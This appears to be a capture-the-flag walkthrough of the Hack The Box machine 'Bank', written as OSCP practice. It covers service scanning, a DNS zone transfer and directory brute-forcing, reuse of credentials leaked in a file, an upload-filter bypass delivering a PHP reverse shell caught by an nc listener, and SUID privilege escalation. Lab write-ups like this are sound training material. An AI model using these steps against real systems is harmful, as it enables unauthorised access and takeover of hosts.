Hello all,
Some quick updates, I decided to schedule my OSCP for early October to give me enough time to run through some more box's then move over to Proving Ground on OffSec's platform.
Now let's jump right in!!
Command:
nmap -sC -sV -T4 -oN nmap.txt 10.10.10.29
- -sC = Default Scripts
- -sV = Probe open ports to determine service/Versions info
- -T4 = Set timing for faster output (0-5)
- -oN = Output to save it to a file
Ports Open:
- 22 SSH OpenSSH 6.6.1p1
- 53 ISC Bind 9.0.5-3ubuntu0
- 80 HTTP Apache HTTPD 2.4.7
Let's run a quick Vulnerability Scan to see what we can find.
Command:
nmap --script vuln -T4 -oN vuln.txt 10.10.10.29
So I see a DoS here but that doesn't really help us because we want to get an RCE on the box :-).
I am going to head over to the site to see what I find there...
Some thing I did while on the site was to check out the source and some of the directories listed but nothing too special stuck out for me.
I am going to run a Dirb to see if there are any hidden directories here.
So both of these sites bring up a Forbidden screen.
Let's now try using Gobuster.
Command:
gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
Being that port 53 is open I am going to checkout the DNS record.
Command:
nslookup
127.0.0.1
10.10.10.29
bank.htb
If you noticed when doing a look at the IP it can't locate but when looking at bank.htb it comes up with the addresses.
Command:
dig axfr @10.10.10.29
As we can see not too many hits...
dig axfr bank.htb @10.10.10.29
I am going to edit the /etc/hosts/ and the /etc/resolv.conf
Command:
10.10.10.29 bank.htb
Command:
nano /etc/resolv.conf
nameserver 10.10.10.29
Let's try and re-run GoBuster!
Command:
gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
After making those quick addition's we get a lot more hits. So let's go check them out.
Clicking on the Parent Directory brings up a login screen for an Email and Password. I tried some dummy emails and common enumeration but it didn't work.
Now I am going to checkout the Balance-Transfer directory, to see if there is anything interesting there.
Each of these look like specific accounts for users with their hashed Email/Passwords with their account balances. If you go down the line, each of the links provides a different account.
One thing we will do is sort by size to see if there is any differences.
After doing so we see there is a 257 size .acc file here. Open it and let's take a look.
Here we can see there is un-hashed account information such as:
- Email = chris@bank.htb
- Password = !##HTBB4nkP4ssw0rd!##
Now head back over to the login screen again and put in the creds we just found.
Click the Support link and it will bring up a way for the current user to submit Files.
On my Kali machine I create a test file to see if I can upload a file.
Command:
touch test.php
Now on your console try and upload it.
Change it from a php file to a jpg file.
So I did some quick GoogleFu and I didn't see any JPG reverse-shells. But when I inspected the page I came across this line of text.
So lets grab a php-reverse-shell then we can update the code to hopefully get a shell.
Command:
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
nano php-reverse-shell.php
Change the IP to your tun0 and the Port IP
chmod +x php-reverse-shell.php
Now we are going to change the php file to a htb file.
Command:
mv php-reverse-shell.php shell.htb
Now let's re-upload this back to the site.
Command:
nc -nvlp 1234
Give it a few seconds then you should get access!
Now let's upgrade the shell using the following scripts Link.
Command:
python -c 'import pty; pty.spawn("/bin/bash")'
Command:
whoami
Priv Esc
Command:
Find / -perm -4000 2>/dev/null
It appears that the Emergency file should be able to run with the appropriate permissions.
Command:
cd /var/htb/bin
ls
./emergency
whoami
Now locate the Root/User .txt files.
Top comments (1)
Can explain more on find perm command. What we tryna do.